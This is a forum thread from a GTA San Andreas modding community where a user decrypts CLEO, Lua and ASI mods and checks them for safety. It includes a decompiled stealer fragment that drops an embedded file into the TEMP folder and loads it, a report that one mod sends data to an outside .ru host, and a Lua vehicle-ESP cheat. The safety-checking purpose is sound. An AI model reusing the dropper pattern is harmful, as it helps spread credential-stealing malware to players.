️ Decrypting/Safety Check CLEO/SF/ASI/DLL


Here you can send files and they will be decrypted(cleo/lua/ahk) !

CLEO / LUA / AHK files can have their encryption removed
In full / in part



The SF / ASI / DLL file will be mainly tested
It is not possible to extract code in an orderly manner from files programmed in C ++
Here you will find out if a file is safe and what it does.
 
Last edited:

AidanGucci

Active member
Joined
Sep 19, 2017
Messages
98
Reaction score
8
try decrypting this efficiently and repacking it back
 

Attachments

  • imbrowser.asi
    440.5 KB · Views: 6

SobFoX

Expert
Joined
Jul 14, 2015
Messages
1,386
Solutions
4
Reaction score
893
Location
Israel
try decrypting this efficiently and repacking it back
Read the topic, first

Encrypted file so that it is less safe to use
In addition, it sends information to port 80 to f0446239.xsph.ru
Using http

Doesn't look particularly safe, but it does look like something posted in blasthack in the past
 

jdrakoulas

Active member
Joined
Mar 10, 2017
Messages
71
Reaction score
18
fucking shit this thread is amazing sobfox ofc the best I dont use encrypted shit ever fuck your copyrights and thinking ur code worths something when its a hack for a 16 y/o game
you gain more shit from learning to code than what hte code is worth
 

AidanGucci

Active member
Joined
Sep 19, 2017
Messages
98
Reaction score
8
Read the topic, first

Encrypted file so that it is less safe to use
In addition, it sends information to port 80 to f0446239.xsph.ru
Using http


Doesn't look particularly safe, but it does look like something posted in blasthack in the past
It's in-game web browser, it surely might have something fishy in it, but I want the decrypted .txt if possible.
 

SobFoX

Expert
Joined
Jul 14, 2015
Messages
1,386
Solutions
4
Reaction score
893
Location
Israel
Try this :v, thanks

PHP:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}
{$USE bitwise}
{$USE CLEO+}
{$USE file}
{$USE ini}
{$USE newOpcodes}

0@ = -22468
gosub 0@
if
0AAB:   file_exists "CLEO\settings.ini"
jf @NONAME_678
0AF0: 1@ = get_int_from_ini_file "cleo\settings.ini" section "HEALTH" key "R"
0AF0: 2@ = get_int_from_ini_file "cleo\settings.ini" section "HEALTH" key "G"
0AF0: 3@ = get_int_from_ini_file "cleo\settings.ini" section "HEALTH" key "B"
0AF0: 4@ = get_int_from_ini_file "cleo\settings.ini" section "MONEY" key "R"
0AF0: 5@ = get_int_from_ini_file "cleo\settings.ini" section "MONEY" key "G"
0AF0: 6@ = get_int_from_ini_file "cleo\settings.ini" section "MONEY" key "B"
0AF0: 7@ = get_int_from_ini_file "cleo\settings.ini" section "ARMOUR" key "R"
0AF0: 8@ = get_int_from_ini_file "cleo\settings.ini" section "ARMOUR" key "G"
0AF0: 9@ = get_int_from_ini_file "cleo\settings.ini" section "ARMOUR" key "B"
0AF0: 10@ = get_int_from_ini_file "cleo\settings.ini" section "WBFONT" key "R"
0AF0: 11@ = get_int_from_ini_file "cleo\settings.ini" section "WBFONT" key "G"
0AF0: 12@ = get_int_from_ini_file "cleo\settings.ini" section "WBFONT" key "B"
0AF0: 13@ = get_int_from_ini_file "cleo\settings.ini" section "WBFOUT" key "R"
0AF0: 14@ = get_int_from_ini_file "cleo\settings.ini" section "WBFOUT" key "G"
0AF0: 15@ = get_int_from_ini_file "cleo\settings.ini" section "WBFOUT" key "B"
0AF0: 16@ = get_int_from_ini_file "cleo\settings.ini" section "WSTAR" key "R"
0AF0: 17@ = get_int_from_ini_file "cleo\settings.ini" section "WSTAR" key "G"
0AF0: 18@ = get_int_from_ini_file "cleo\settings.ini" section "WSTAR" key "B"
jump @NONAME_758

:NONAME_678
wait 0
if
8AAB:   not file_exists "CLEO\settings.ini"
jf -11
0ACC: show_text_lowpriority "FILE 'settings.ini' not found!" time 3000
jump -11
[B][COLOR=rgb(251, 160, 38)]E[/COLOR][COLOR=rgb(147, 101, 184)]nj[/COLOR][COLOR=rgb(44, 130, 201)]oy[/COLOR]![/B]
:NONAME_758
wait 0
0A8C: write_memory 12235308 size 1 value 1@ virtual_protect 1
0A8C: write_memory 12235309 size 1 value 2@ virtual_protect 1
0A8C: write_memory 12235310 size 1 value 3@ virtual_protect 1
0A8C: write_memory 12235312 size 1 value 4@ virtual_protect 1
0A8C: write_memory 12235313 size 1 value 5@ virtual_protect 1
0A8C: write_memory 12235314 size 1 value 6@ virtual_protect 1
0A8C: write_memory 12235316 size 1 value 228 virtual_protect 1
0A8C: write_memory 12235317 size 1 value 17 virtual_protect 1
0A8C: write_memory 12235318 size 1 value 17 virtual_protect 1
0A8C: write_memory 12235320 size 1 value 10@ virtual_protect 1
0A8C: write_memory 12235321 size 1 value 11@ virtual_protect 1
0A8C: write_memory 12235322 size 1 value 12@ virtual_protect 1
0A8C: write_memory 12235324 size 1 value 7@ virtual_protect 1
0A8C: write_memory 12235325 size 1 value 8@ virtual_protect 1
0A8C: write_memory 12235326 size 1 value 9@ virtual_protect 1
0A8C: write_memory 12235328 size 1 value 13@ virtual_protect 1
0A8C: write_memory 12235329 size 1 value 14@ virtual_protect 1
0A8C: write_memory 12235330 size 1 value 15@ virtual_protect 1
0A8C: write_memory 12235332 size 1 value 16@ virtual_protect 1
0A8C: write_memory 12235333 size 1 value 17@ virtual_protect 1
0A8C: write_memory 12235334 size 1 value 18@ virtual_protect 1
0A8C: write_memory 12235336 size 1 value 240 virtual_protect 1
0A8C: write_memory 12235337 size 1 value 0 virtual_protect 1
0A8C: write_memory 12235338 size 1 value 0 virtual_protect 1
jump @NONAME_758
 

SobFoX

Expert
Joined
Jul 14, 2015
Messages
1,386
Solutions
4
Reaction score
893
Location
Israel
It's Possible Decrypt This Mod?
Stealer, I doubt anyone can decrypt it


STEALER / VIRUS!
PHP:
:NONAME_33289
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetEnvironmentVariableA" library 0@ // IF and SET
alloc 2@ 260
0AA5: call 1@ num_params 3 pop 0 260 2@ "TEMP"
alloc 4@ 260
format 4@ "%s\\samp.dat" 2@
0AC6: 5@ = label @NONAME_9 offset
0AA7: call_function 8532696 num_params 2 pop 2 "wb" 4@ 3@
0AA7: call_function 8533620 num_params 4 pop 4 3@ 33280 1 5@ 6@
0AA7: call_function 8532363 num_params 1 pop 1 3@ 6@
0AA2: 6@ = load_library 4@ // IF and SET
 

HaroldGnomo

Well-known member
Joined
Jun 20, 2021
Messages
211
Reaction score
58
Location
Sahara Desert
STEALER / VIRUS!
PHP:
:NONAME_33289
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetEnvironmentVariableA" library 0@ // IF and SET
alloc 2@ 260
0AA5: call 1@ num_params 3 pop 0 260 2@ "TEMP"
alloc 4@ 260
format 4@ "%s\\samp.dat" 2@
0AC6: 5@ = label @NONAME_9 offset
0AA7: call_function 8532696 num_params 2 pop 2 "wb" 4@ 3@
0AA7: call_function 8533620 num_params 4 pop 4 3@ 33280 1 5@ 6@
0AA7: call_function 8532363 num_params 1 pop 1 3@ 6@
0AA2: 6@ = load_library 4@ // IF and SET
oh no, its bad people create these infected files :(
 

3dvizo

New member
Joined
Aug 23, 2020
Messages
4
Reaction score
0
Location
Lithuania
Hey, can you decrypt this file? I want to edit work cars ID not to show.
 

Attachments

  • masinos.rar
    984 bytes · Views: 10

SobFoX

Expert
Joined
Jul 14, 2015
Messages
1,386
Solutions
4
Reaction score
893
Location
Israel
Hey, can you decrypt this file? I want to edit work cars ID not to show.
Enjoy!
PHP:
require("lib.moonloader")

slot0 = require("vkeys")
font = renderCreateFont("Century Gothic", 8, 7)

function main()
    while not isSampAvailable() do
        wait(0)
    end

    wait(1)
    sampRegisterChatCommand("car", activator)

    while true do
        wait(0)

        if enabled then
            for slot3, slot4 in ipairs(getAllVehicles()) do
                if isCarOnScreen(slot4) then
                    slot6 = getCarModel(slot4)

                    if getDriverOfCar(slot4) == -1 and slot6 ~= 588 and slot6 ~= 470 and slot6 ~= 409 and slot6 ~= 437 and slot6 ~= 544 and slot6 ~= 452 and slot6 ~= 420 and slot6 ~= 459 and slot6 ~= 403 and slot6 ~= 407 and slot6 ~= 423 and slot6 ~= 427 and slot6 ~= 431 and slot6 ~= 438 and slot6 ~= 447 and slot6 ~= 454 and slot6 ~= 490 and slot6 ~= 528 and slot6 ~= 578 and slot6 ~= 552 and slot6 ~= 408 and slot6 ~= 487 and slot6 ~= 525 and slot6 ~= 435 and slot6 ~= 599 and slot6 ~= 456 and slot6 ~= 523 and slot6 ~= 596 and slot6 ~= 597 then
                        slot7, slot8, slot9 = getCarCoordinates(slot4)
                        slot11, slot12, slot13 = getCharCoordinates(PLAYER_PED)
                        slot15, slot16 = convert3DCoordsToScreen(slot11, slot12, slot13)
                        slot17, slot18 = convert3DCoordsToScreen(slot7, slot8, slot9)

                        renderDrawLine(slot15, slot16, slot17, slot18, 1.1, 4291821568.0)
                        renderFontDrawText(font, "Atstumas iki masinos " .. getDistanceBetweenCoords3d(slot11, slot12, slot13, slot7, slot8, slot9), slot17, slot18, -1)
                        renderFontDrawText(font, "Masinos id:" .. getCarModel(slot4), slot17, slot18 - 15, -1)
                    end
                end
            end
        end
    end
end

function activator(slot0)
    enabled = not enabled

    sampAddChatMessage(enabled and "{FFAD40}MASINOS ON" or "{FFAD40}MASINOS OFF", -1)
end
 
Last edited:
Top